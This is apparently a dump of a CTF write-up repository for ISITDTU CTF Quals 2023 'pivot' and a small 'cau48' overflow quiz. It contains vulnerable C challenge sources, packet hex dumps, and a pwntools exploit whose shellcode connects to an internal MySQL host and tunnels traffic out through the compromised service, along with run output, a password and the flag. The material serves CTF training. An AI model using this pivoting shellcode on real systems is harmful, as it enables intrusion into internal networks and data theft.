qVwSWlFy ne5BGuwF 63 | 000001ED 69 68 72 2b 5a 6f 37 52 64 68 50 45 58 63 34 63 ihr+Zo7R dhPEXc4c 64 | 000001FD 55 6f 2b 64 73 0a 30 51 49 44 41 51 41 42 0a 2d Uo+ds.0Q IDAQAB.- 
65 | 0000020D 2d 2d 2d 2d 45 4e 44 20 50 55 42 4c 49 43 20 4b ----END PUBLIC K 66 | 0000021D 45 59 2d 2d 2d 2d 2d 0a EY-----. 67 | 000001BE 00 01 00 05 ab 20 73 ff 57 43 91 3c 3f 53 21 0c ..... s. WC..> t..#..4. 78 | 0000026E 7e d2 f3 9e 09 32 99 2f a6 8b b2 76 b0 6a ae d0 ~....2./ ...v.j.. 79 | 0000027E e1 ca 18 c3 7b 21 6b 02 46 eb 63 23 67 18 ec 3d ....{!k. F.c#g..= 80 | 0000028E e1 4e a1 99 db d4 f6 bf 58 20 70 bd 1b 8c 24 3c .N...... X p...$< 81 | 0000029E f9 e0 41 46 2e a6 68 61 03 dc 33 e9 cd 00 e8 b0 ..AF..ha ..3..... 82 | 000002AE e0 05 2c 97 a4 24 e2 98 2f 9d fa 17 76 3b 75 9c ..,..$.. /...v;u. 83 | 000002BE 31 8d 01 2c 1.., 84 | 00000225 10 00 00 06 00 00 00 02 40 00 00 00 07 01 05 04 ........ @....... 85 | 00000235 66 6c 34 67 fl4g 86 | 000002C2 13 00 00 00 03 73 65 6c 65 63 74 20 2a 20 66 72 .....sel ect * fr 87 | 000002D2 6f 6d 20 66 6c 34 67 om fl4g 88 | 00000239 01 00 00 01 01 2a 00 00 02 03 64 65 66 04 66 6c .....*.. ..def.fl 89 | 00000249 34 67 04 66 6c 34 67 04 66 6c 34 67 04 66 6c 61 4g.fl4g. fl4g.fla 90 | 00000259 67 04 66 6c 61 67 0c 21 00 fd 02 00 00 fd 00 00 g.flag.! ........ 91 | 00000269 00 00 00 05 00 00 03 fe 00 00 22 00 25 00 00 04 ........ ..".%... 92 | 00000279 24 49 53 49 54 44 54 55 7b 70 69 76 30 74 5f 69 $ISITDTU {piv0t_i 93 | 00000289 35 5f 6e 30 54 5f 76 33 72 79 5f 64 69 46 66 69 5_n0T_v3 ry_diFfi 94 | 00000299 63 55 6c 54 7d 05 00 00 05 fe 00 00 22 00 cUlT}... ....". 95 | 000002D9 01 00 00 00 01 ..... 
96 | -------------------------------------------------------------------------------- /2023/ISITDTU CTF QUALS 2023/pivot/pivot.c: -------------------------------------------------------------------------------- 1 | // sudo apt-get install libseccomp-dev 2 | // gcc pivot.c -o pivot -fno-stack-protector -no-pie -s -lseccomp 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | 10 | 11 | void init_seccomp() 12 | { 13 | scmp_filter_ctx ctx = NULL; 14 | ctx = seccomp_init(SCMP_ACT_ALLOW); 15 | if (ctx == NULL) 16 | { 17 | { 18 | printf("seccomp error\\n"); 19 | exit(0); 20 | } 21 | } 22 | seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(execve), 0); 23 | seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(execveat), 0); 24 | seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(kill), 0); 25 | seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(tkill), 0); 26 | seccomp_load(ctx); 27 | } 28 | 29 | void timeout() 30 | { 31 | exit(1); 32 | } 33 | 34 | void setup() 35 | { 36 | setbuf(stdin, 0); 37 | setbuf(stdout, 0); 38 | setbuf(stderr, 0); 39 | signal(SIGALRM, timeout); 40 | alarm(60); 41 | } 42 | int main() 43 | { 44 | int (*ret)(); 45 | char *addr; 46 | addr = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_PRIVATE, -1, 0); 47 | setup(); 48 | init_seccomp(); 49 | puts("Blacklist: execve, execveat, kill, tkill\nFind flag"); 50 | read(0, addr, 0x1000); 51 | ret = addr; 52 | ret(); 53 | return 0; 54 | } -------------------------------------------------------------------------------- /2023/ISITDTU CTF QUALS 2023/pivot/pivot.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys, os 4 | context.arch = 'amd64' 5 | def pivot(DEBUG): 6 | if DEBUG=='1': 7 | r = process('./pivot') 8 | # raw_input('debug?') 9 | elif DEBUG=='2': 10 | HOST = '34.126.117.161' 11 | PORT = 9999 12 | r = remote(HOST,PORT) 13 | 14 | log.info("Run command: mysql --skip-ssl -h localhost -P 33066 -u 
isitdtu --password=qp37RWf@@Ygvd@ fl4g -e 'select * from fl4g'") 15 | l = listen(33066) 16 | 17 | def server_read(): 18 | log.info("server_read") 19 | data = l.recv(0x500) 20 | r.send(data) 21 | return data 22 | 23 | def server_write(): 24 | log.info("server_write") 25 | data = r.recv(0x500) 26 | l.send(data) 27 | return data 28 | 29 | def shell_server2client(): 30 | shell = pwnlib.shellcraft.amd64.linux.read('rbp', 'r10', 0x500) 31 | shell += pwnlib.shellcraft.amd64.linux.write(1, 'r10', 'rax') 32 | return shell 33 | 34 | def shell_client2server(): 35 | shell = pwnlib.shellcraft.amd64.linux.read(0, 'r10', 0x500) 36 | shell += pwnlib.shellcraft.amd64.linux.write('rbp', 'r10', 'rax') 37 | return shell 38 | 39 | def gen_shellcode(): 40 | host = '10.10.10.3' 41 | port = 3306 42 | shellcode = asm( 43 | """ 44 | push 0x404108 45 | pop r10 46 | """ + 47 | pwnlib.shellcraft.amd64.linux.connect(host, port) + 48 | shell_server2client()+ 49 | shell_client2server()+ 50 | shell_server2client()+ 51 | """ 52 | cmp byte ptr [r10+5], 0x3 53 | je s2c 54 | loop: 55 | """+ 56 | shell_client2server()+ 57 | """ 58 | s2c: 59 | """+ 60 | shell_server2client()+ 61 | """ 62 | jmp loop 63 | """ 64 | ) 65 | return shellcode 66 | 67 | def py_read_write(): 68 | server_write() 69 | server_read() 70 | data = server_write() 71 | if data[5] == 3: 72 | log.info("plaintext") 73 | server_write() 74 | else: 75 | log.info("pubkey") 76 | 77 | while 1: 78 | data = server_read() 79 | if data == b'\x01\x00\x00\x00\x01': 80 | log.info("Done") 81 | exit() 82 | server_write() 83 | 84 | shellcode = gen_shellcode() 85 | r.recv(10) 86 | 87 | _ = l.wait_for_connection() 88 | r.send(shellcode) 89 | py_read_write() 90 | r.interactive() 91 | 92 | pivot(sys.argv[1]) 93 | """ 94 | $ python pivot.py 2 95 | [+] Opening connection to 34.126.117.161 on port 9999: Done 96 | [*] Run command: mysql --skip-ssl -h localhost -P 33066 -u isitdtu --password=qp37RWf@@Ygvd@ fl4g -e 'select * from fl4g' 97 | [+] Trying to bind to :: 
on port 33066: Done 98 | [+] Waiting for connections on :::33066: Got connection from ::ffff:127.0.0.1 on port 35620 99 | [*] server_write 100 | [*] server_read 101 | [*] server_write 102 | [*] plaintext 103 | [*] server_write 104 | [*] server_read 105 | [*] server_write 106 | [*] server_read 107 | [*] Done 108 | [*] Closed connection to ::ffff:127.0.0.1 port 35620 109 | [*] Closed connection to 34.126.117.161 port 9999 110 | 111 | $ mysql --skip-ssl -h localhost -P 33066 -u isitdtu --password=qp37RWf@@Ygvd@ fl4g -e 'select * from fl4g' 112 | +--------------------------------------+ 113 | | flag | 114 | +--------------------------------------+ 115 | | ISITDTU{piv0t_i5_n0T_v3ry_diFficUlT} | 116 | +--------------------------------------+ 117 | """ -------------------------------------------------------------------------------- /2023/ISITDTU CTF QUALS 2023/pivot/pivot_docker.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2023/ISITDTU CTF QUALS 2023/pivot/pivot_docker.tar.gz -------------------------------------------------------------------------------- /2023/ISITDTU CTF QUALS 2023/pivot/plaintext.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2023/ISITDTU CTF QUALS 2023/pivot/plaintext.pcap -------------------------------------------------------------------------------- /2023/ISITDTU CTF QUALS 2023/pivot/pubkey.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2023/ISITDTU CTF QUALS 2023/pivot/pubkey.pcap -------------------------------------------------------------------------------- /README.md: 
-------------------------------------------------------------------------------- 1 | # ctf-writeups 2 | -------------------------------------------------------------------------------- /quiz/cau48/cau48: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/quiz/cau48/cau48 -------------------------------------------------------------------------------- /quiz/cau48/cau48.c: -------------------------------------------------------------------------------- 1 | // gcc cau48.c -m32 -o cau48 -fno-stack-protector 2 | 3 | #include 4 | #include 5 | #include 6 | 7 | char global[0x200]; 8 | int f1(); 9 | int x(int p0, int p1); 10 | int main() 11 | { 12 | f1(); 13 | } 14 | 15 | int f(){ 16 | char str[0x100]; 17 | fgets(global, 0x200, stdin); 18 | strncpy(str, global, 0x100); 19 | sprintf(global, "Hello %s\n", str); 20 | printf("global len: %#x", strlen(global)); 21 | exit(1); 22 | } 23 | int f1() 24 | { 25 | char s[0x200]; 26 | memset(s, 'B', 0x200); 27 | x(0x90909090, 0x90909090); 28 | f(); 29 | } 30 | int x(int p0, int p1){ 31 | return p0+p1; 32 | } -------------------------------------------------------------------------------- /quiz/cau48/cau48.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def cau48(): 6 | r = process("./cau48") 7 | raw_input("debug?") 8 | r.send("C"*0x300) 9 | print r.recv() 10 | r.interactive() 11 | 12 | cau48() --------------------------------------------------------------------------------